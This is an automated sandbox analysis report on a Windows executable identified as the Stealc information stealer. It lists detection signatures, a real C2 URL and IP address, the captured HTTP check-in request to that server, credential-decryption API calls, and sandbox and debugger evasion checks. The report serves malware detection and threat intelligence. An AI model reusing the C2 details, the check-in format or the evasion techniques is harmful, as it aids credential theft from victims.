Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1541350
MD5:20a21ec73989a782b2b0243f0ed123ba
SHA1:e81022b1710d56722b6f61b61c7d4a798d9dcbba
SHA256:8313f9dad601a181e4ec94751f43c08ae280504db80c68fbb6ff86e26902d38b
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7348 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 20A21EC73989A782B2B0243F0ED123BA)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1747910507.000000000160E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.1705441818.0000000004FE0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 7348JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 7348JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.dc0000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-24T18:08:02.054638+020020442431Malware Command and Control Activity Detected192.168.2.449730185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Source: http://185.215.113.37/wsURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.dc0000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DCC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_00DCC820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DC9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00DC9AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DC7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00DC7240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DC9B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00DC9B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DD8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00DD8EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DD38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00DD38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DD4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00DD4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DCDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00DCDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DCE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00DCE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DD4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00DD4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DCED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00DCED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DC16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00DC16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DCF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00DCF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DD3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00DD3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DCBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00DCBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DCDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00DCDE10

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBGHJEBKJEGHJKECAAKJHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 30 44 32 33 35 38 38 36 46 38 37 32 35 35 36 31 33 34 35 35 39 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 2d 2d 0d 0a Data Ascii: ------DBGHJEBKJEGHJKECAAKJContent-Disposition: form-data; name="hwid"E0D235886F872556134559------DBGHJEBKJEGHJKECAAKJContent-Disposition: form-data; name="build"doma------DBGHJEBKJEGHJKECAAKJ--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DC4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00DC4880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBGHJEBKJEGHJKECAAKJHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 30 44 32 33 35 38 38 36 46 38 37 32 35 35 36 31 33 34 35 35 39 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 2d 2d 0d 0a Data Ascii: ------DBGHJEBKJEGHJKECAAKJContent-Disposition: form-data; name="hwid"E0D235886F872556134559------DBGHJEBKJEGHJKECAAKJContent-Disposition: form-data; name="build"doma------DBGHJEBKJEGHJKECAAKJ--
                Source: file.exe, 00000000.00000002.1747910507.000000000160E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.1747910507.0000000001667000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.1747910507.0000000001667000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/(
                Source: file.exe, 00000000.00000002.1747910507.0000000001659000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1747910507.0000000001667000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1747910507.0000000001699000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.1747910507.0000000001659000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php/
                Source: file.exe, 00000000.00000002.1747910507.0000000001667000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php2
                Source: file.exe, 00000000.00000002.1747910507.0000000001659000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpS
                Source: file.exe, 00000000.00000002.1747910507.0000000001659000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php_
                Source: file.exe, 00000000.00000002.1747910507.0000000001667000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/t
                Source: file.exe, 00000000.00000002.1747910507.0000000001667000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/ws
                Source: file.exe, 00000000.00000002.1747910507.000000000160E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37e

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011401010_2_01140101
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010541440_2_01054144
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011820000_2_01182000
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0104F8BA0_2_0104F8BA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011853950_2_01185395
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0118320D0_2_0118320D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011922060_2_01192206
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0105DAB20_2_0105DAB2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01060ACD0_2_01060ACD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0117355A0_2_0117355A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010C9C120_2_010C9C12
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011864B10_2_011864B1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0118B4A70_2_0118B4A7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0111FF6D0_2_0111FF6D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01187F850_2_01187F85
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0127278A0_2_0127278A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0118F7FF0_2_0118F7FF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0120F7D40_2_0120F7D4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0118CFE60_2_0118CFE6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011906280_2_01190628
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00DC45C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: letztgfz ZLIB complexity 0.9949451708038733
                Source: file.exe, 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1705441818.0000000004FE0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DD8680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00DD8680
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DD3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00DD3720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\S9Z3CKQS.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1821696 > 1048576
                Source: file.exeStatic PE information: Raw size of letztgfz is bigger than: 0x100000 < 0x196a00

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.dc0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;letztgfz:EW;rrfcshya:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;letztgfz:EW;rrfcshya:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DD9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00DD9860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1c56a1 should be: 0x1cad2c
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: letztgfz
                Source: file.exeStatic PE information: section name: rrfcshya
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0105690D push 4FB3E6E9h; mov dword ptr [esp], ebp0_2_01056927
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0105690D push 42A9593Ah; mov dword ptr [esp], edx0_2_01056969
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0105690D push ebx; mov dword ptr [esp], edx0_2_01056A18
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01140101 push edx; mov dword ptr [esp], 15D8BE3Eh0_2_01140149
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01140101 push ebx; mov dword ptr [esp], esi0_2_01140213
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01140101 push edx; mov dword ptr [esp], ecx0_2_0114030C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01213136 push esi; mov dword ptr [esp], eax0_2_01213161
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01054144 push ecx; mov dword ptr [esp], ebp0_2_0105419F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01054144 push 5B1AD910h; mov dword ptr [esp], edx0_2_010541B6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01054144 push ebp; mov dword ptr [esp], ebx0_2_01054231
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01054144 push 0DBF08EAh; mov dword ptr [esp], edx0_2_0105423E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01054144 push 4D6E191Dh; mov dword ptr [esp], edx0_2_0105428C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01054144 push 5B913A21h; mov dword ptr [esp], edx0_2_010542E6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01054144 push 06E81A1Ah; mov dword ptr [esp], eax0_2_01054316
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011FA15A push ecx; mov dword ptr [esp], 098B45D4h0_2_011FA189
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011FA15A push edx; mov dword ptr [esp], 79FE1F41h0_2_011FA1AC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011FA15A push 466C91E1h; mov dword ptr [esp], eax0_2_011FA266
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012291B5 push eax; mov dword ptr [esp], 7FFA7D67h0_2_012291D6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012359B4 push eax; mov dword ptr [esp], 2E8F26B1h0_2_012358C7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012231BF push 124B890Fh; mov dword ptr [esp], eax0_2_012231E6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012231BF push 2A8ABD71h; mov dword ptr [esp], ebx0_2_012231EE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012231BF push 79457612h; mov dword ptr [esp], esp0_2_0122320B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012239C6 push eax; mov dword ptr [esp], edx0_2_012239E5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DDB035 push ecx; ret 0_2_00DDB048
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011F69F4 push eax; mov dword ptr [esp], esp0_2_011F6A59
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01182000 push edi; mov dword ptr [esp], ecx0_2_0118201D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01182000 push 077BE303h; mov dword ptr [esp], edi0_2_011820B8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01182000 push 744C46D0h; mov dword ptr [esp], ecx0_2_01182136
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01182000 push edx; mov dword ptr [esp], ebx0_2_0118215A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01182000 push edi; mov dword ptr [esp], ecx0_2_01182173
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01182000 push ebp; mov dword ptr [esp], edi0_2_0118225C
                Source: file.exeStatic PE information: section name: letztgfz entropy: 7.95471366265782

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DD9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00DD9860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13601
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1021B4F second address: 1021B63 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 ja 00007F7ADD664230h 0x0000000f pushad 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1197CD0 second address: 1197CD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1182B40 second address: 1182B46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1196C8F second address: 1196C93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1196C93 second address: 1196CC9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F7ADD664238h 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007F7ADD664233h 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007F7ADD66422Bh 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1196CC9 second address: 1196CCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
